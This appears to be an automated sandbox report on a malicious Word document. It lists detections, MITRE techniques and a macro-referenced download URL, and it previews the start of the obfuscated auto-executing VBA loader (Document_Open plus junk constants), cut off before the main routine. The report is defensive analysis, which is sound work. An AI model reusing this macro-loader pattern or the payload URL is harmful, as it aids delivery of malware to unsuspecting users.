MALICIOUS
424
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
This OOXML document contains a VBA project with an auto-executing Document_Open macro. The macro is obfuscated and uses the Shell() function to execute a command that likely downloads and runs a second-stage payload. The presence of a VBA project, an auto-exec macro, and a Shell() call strongly indicates a malicious macro loader.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6923121-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6923121-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://a.doko.moe/pskige Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 25313 bytes |
SHA-256: b9eb3dfe7dd3091e24293fe9cc399c3b21fda88b5cab41fea6052e734a65f6ad |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 22 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
WNRXI.IRPGUILKL
'JupaGdQnDvRbnekqWydT
Dim hlCflIayRFeGPXCgSHqhKxLCIedvgWUJAR
'JnuVVqomqnUYHhJErnmlkZzXHe
Dim JnuVVqomqnUYHhJErnmlkZzXHe
End Sub
Attribute VB_Name = "WNRXI"
Const HpOfnTwuLvqiNCXOzwoqykwgwJnYDnzgbMVDLiVGqIXonFgJbrwHRnnldRY = 135
Private Const trDkJtLucXYEaqAVagLyWsiidfYqYw5033 = 4
Const HBOdXwLfwnpUJYFNiDR544058045 = 86
Private Const BHpReXLlMvculmprEzdKDKReg = 8
Const YKYSpnGXKsnxcNbEBbSTowHB025492697831412603 = 4
Private Const APNRBJUHdVUWgMQDLMdYOAPLg135 = 22
Const UQwtozkDsVwIHMIvtdkYZSOYB4079652 = 8807182
Private Const emmYgNpVAqrFZAVXgPuBkkgYS62302254202 = 294866
Const vNEnAFyHfxESsMUIZwQYZKowAdl978979691 = 4079652
Private Const LlkNfyVvLbsFkTVwvOQpRphSL294866 = 544058045
Const LzyVEhKnpGZQAcCrqNZOPXUpOCjsvNOHIgutEtqS = 2
Private Const wYBJIcmBkwYFTZBPxy7942 = 1
Const DboeiOXmXysMnpFcaQCsiM2 = 98
Private Const hAAHxaDKQAbWydReAjsVjTLTE = 5
Const WYJEWSoZJcrYUgxH777290021481128 = 1
Private Const kIJFTQEJSCKygItSukqODskkQNwazvFire02 = 40
Const xLWTnGfwuVrgqzrdyYTFbnHjK2 = 542
Private Const VUImQRgFoAemjiGdTOXQdWeKO106475603216581 = 64
Const TBCfIPZEwZTFJozWQlcpyDoWFuO434623 = 2
Private Const hNHCUxlmkMjYJRDmrmSEjSGke64 = 2
Const PIyTrHNuRgHmMNIqaLlikmAPrZNqsbPhFthTOvaxtgPYcFlubXLV = 41
Private Const AZivlATNwrlxLhCrsMvmcYAVsvtc7968 = 7
Const ibRuetsxMAMtvtiaoX197826504 = 44
Private Const VgusyBXMBvCqJhidSCDspDAFP = 4
Const TChnKufMjsgfRvEYqszLw130383949766275623 = 7
Private Const jIXfdaGbZMCqGqFO41 = 36
Const tGNUvNyDnnqQCFuDaIagtrtyh104 = 272
Private Const yIEAZfeIOKTYZijtwkVJgpbYx11490061136303481 = 322
Const KMeQTkqqVPxQntSXxkrEhWSlCtT075716266 = 104
Private Const PSxiJsJSvmpTQUiMozsSpgalI322 = 197826504
Const AELYvRzXdfszEOpRnwrSVpZWKTnkzfXgCpLRLYSJqiDLE = 953
Private Const FHvOBnDZNWbXatlFxJybnhqVqLqMjbAub5912 = 5
Const uwPJudvyQJQceVELpnsqFX2165 = 57
Private Const yaFznVBcekVrpeCnDiQPUwNak = 7
Const hVIYmNCkNXeomEgEIfnj62971113301302961 = 5
Private Const aXpwqqlWhwHyoqnPUgpRhF953 = 56
Const XJctoYyVnMLZGMJtVioLOUMeE6 = 7560
Private Const wCxoPeZmmsfLxqDaMjwDEIGNQ99168504410 = 14219630
Const toIVdQiEfkZSeQZlFLdulpxXKFS7671811 = 6
Private Const fakZWUGnVTaWueAccYErToQxt14219630 = 2165
Const TSTIUQdRPLBdcMfCjWujZcMTIJIcWvbupyVqLciiSDlNrgkx = 83
Private Const oSDZEfNleWwCxjNRmIfJAuBH1544 = 5
Const IlTfYurGuTBMDMjyPyFPcFz466003030 = 80
Private Const pLGKdAoKUUbrwWeRGEKHquttw = 4
Const PLEivvKkvvrrDmJD16321732693 = 5
Private Const cxQwDYtQwFwttFFbFw83 = 50
Const hLeFgRTrRrLidVdFeGXoImBAQ0 = 2453
Private Const NrAYFZcsckTTTqMbzZLBXUlEX710818916159601 = 5
Const ngOKtCocdqEicZBbyvFPMVGqjYb5865 = 0
Private Const ynXCXzTbZfJgfKiWSTqetxQxG5 = 466003030
Const tlUXgGVJopXmRgJkUZkbmaXXdlNVVrdEXkCGJFltCjUPECxjNazj = 30
Private Const wSdYTSBTOLYHOXxHWgTP2540 = 8
Const lBhJCsSOwtutHMVLyTzepWIAdNOd9690619 = 47
Private Const sPIZCBWUYlOrUyHGWqzXssyKS = 3
Const NUksOsggpepyvwcvbADPjCaw6139608957 = 8
Private Const BxRxfLRwORZiFRRdOHLcv30 = 23
Const SQFiKdwCveFyzkoiVbgguswJG006113630 = 481
Private Const eggzYEPWVAwRCOzFiBAGWGtmT3934356492514534 = 5163
Const BCPScUCZtlMCfvzPNfSkHXzjrUK7114 = 6113630
Private Const mzqvtkTVxghqMgyBlBkThKPzY05163 = 9690619
Const LMCdxPvYvPgfMBzNcuPGYWxJeJJAQRGqoScYtExwbguuuKdt = 382
Private Const vTLsjfdPQOghUyHulwErSgXnQArIAdvpOG3465 = 3
Const eEDpPmQPxVRsemVVcSGdPvXcioUO413403993 = 57
Private Const RmAYKWDpYNSMErinCGwMGwYBQ = 4
Const RCceeyeNIgmUdBbzWEeaayjdAT406145551542081 = 3
Private Const TqTOQdpiHoECQZSyHNWfISXHdSigaG382 = 96
Const OSOFnYnycwApeduaocPFiRETD57 = 7
Private Const mFjXFUkPguGnEHYTqaEfqZpyq2686639048892 = 5
Const GwKPgbOEqZSZBzcIbvCmCUMQXhM1 = 57
Private Const qzGDtoELaXVKpXtJINNqXCHMG5 = 413403993
Public Sub IRPGUILKL()
On Error Resume Next
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 70656 bytes |
SHA-256: 55a410f76f4ddce76268b9d86ff945154661fca87e90cd18b4fd9dc76f7131fb |
|||
|
Detection
ClamAV:
Doc.Malware.Generic-6923121-0
Obfuscation or payload:
likely
Carved artifact contains 22 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.